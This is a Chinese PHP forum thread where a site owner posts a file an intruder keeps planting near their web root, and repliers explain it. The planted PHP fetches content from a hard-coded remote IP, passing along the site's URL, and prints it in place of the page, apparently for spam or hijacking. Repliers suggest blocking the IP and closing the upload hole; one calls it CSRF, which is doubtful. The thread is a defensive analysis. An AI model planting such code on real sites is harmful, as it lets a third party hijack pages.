PHP代码请高手帮忙看下什么意思-php教程-PHP中文网

首页

后端开发

php教程

PHP代码请高手帮忙看下什么意思

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 20, 2016 pm 12:29 PM

我网站好像被黑了，总有个SB天天来我网站根目录放一个文件，打开后代码如下：
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Remote_server = "http://122.114.126.160/";
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name);
echo $Content_mb;
exit();
function getHTTPPage($url) {
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context);
if (empty($html)) {
exit("

Connection Error!

");
}
return $html;
}
?>

这什么意图?求高手分析下

回复讨论(解决方案)

他把这个代码放到你根目录下，网站是不是访问不了？

好像是他把你网站原始地址传到他自己写的一个方法里面用 host 参数接受然后抓取你首页的信息吧

我网站没异常（我还没发现异常）

好像是他把你网站原始地址传到他自己写的一个方法里面用 host 参数接受然后抓取你首页的信息吧

我网站没异常（我还没发现异常）

上面我的描述有问题，这个文件不是放在更目录，是放在根目录的上一个目录，如图：

public_html 这个目录里面是网站的根目录，他这个文件和public_html放在同一个目录，不知道他这样对我的网站有什么影响。这SB隔天来次，已经删了几次了。
linux系统，目前权限设置为755，设置为644网站就打不开了，有什么办法不让他上次文件吗？

$Remote_server."/index.html?host=".$host_name 这个地方他把你的网站地址传过去不知道干什么了，代码在那个ip的服务器上面看不到。。。。。猜不来他要干什么。。。。。

服务器那方面的我不懂，等高手来把，

谢谢你

没有异常？
set_time_limit(0); //永不超时
header("Content-Type: text/html;charset=gb2312"); //指定浏览器字符集
$Remote_server = "http://122.114.126.160/"; //远程网站
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; //构造当前页的 url
$userAgent = $_SERVER['HTTP_USER_AGENT']; //获取浏览者的浏览器信息
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name); //调用远程网站
echo $Content_mb; //输出远程网站返回内容
exit(); //退出程序运行
function getHTTPPage($url) { //调用远程网站函数
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context); //访问远程网站，你的url也传过去了
if (empty($html)) {
exit("

Connection Error!

");
}
return $html;
}

至于对方做了什么？目前尚不清楚
如果是在本地开发环境，返回的是广告，正常的页面没有了
如果是运行中的网站，那么若没异样的话，就说明潜在的威胁是很大的（CSRF攻击）
仅是出一点广告，倒是也无所谓

不管怎么样，先把对方的IP给禁掉吧，配置你的服务器：禁止122.114.126.160的IP访问你的网站。

把你页面的内容替换了。
先看看程序那里有漏洞让人上传文件比较好，漏洞不封以后还是很多问题的。

Connection Error!

");
}
return $html;
}

至于对方做了什么？目前尚不清楚
如果是在本地开发环境，返回的是广告，正常的页面没有了
如果是运行中的网站，那么若没异样的话，就说明潜在的威胁是很大的（CSRF攻击）
仅是出一点广告，倒是也无所谓

-------------------------
感谢

不管怎么样，先把对方的IP给禁掉吧，配置你的服务器：禁止122.114.126.160的IP访问你的网站。

-------------------------
感谢

把你页面的内容替换了。
先看看程序那里有漏洞让人上传文件比较好，漏洞不封以后还是很多问题的。

-------------------------
感谢

我猜测他是想放到你public_html文件夹下seo.php，如果有文件就是替换掉里面的文件
结果/打错了，变成还在外面的文件夹

谢谢有可能

声明

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系admin@php.cn

在Laravel中使用Flash会话数据Mar 12, 2025 pm 05:08 PM

Laravel使用其直观的闪存方法简化了处理临时会话数据。这非常适合在您的应用程序中显示简短的消息，警报或通知。默认情况下，数据仅针对后续请求： $请求 -

php中的卷曲：如何在REST API中使用PHP卷曲扩展Mar 14, 2025 am 11:42 AM

PHP客户端URL（curl）扩展是开发人员的强大工具，可以与远程服务器和REST API无缝交互。通过利用Libcurl（备受尊敬的多协议文件传输库），PHP curl促进了有效的执行

PHP记录：PHP日志分析的最佳实践Mar 10, 2025 pm 02:32 PM

PHP日志记录对于监视和调试Web应用程序以及捕获关键事件，错误和运行时行为至关重要。它为系统性能提供了宝贵的见解，有助于识别问题并支持更快的故障排除

简化的HTTP响应在Laravel测试中模拟了Mar 12, 2025 pm 05:09 PM

Laravel 提供简洁的 HTTP 响应模拟语法，简化了 HTTP 交互测试。这种方法显着减少了代码冗余，同时使您的测试模拟更直观。基本实现提供了多种响应类型快捷方式： use Illuminate\Support\Facades\Http; Http::fake([ 'google.com' => 'Hello World', 'github.com' => ['foo' => 'bar'], 'forge.laravel.com' =>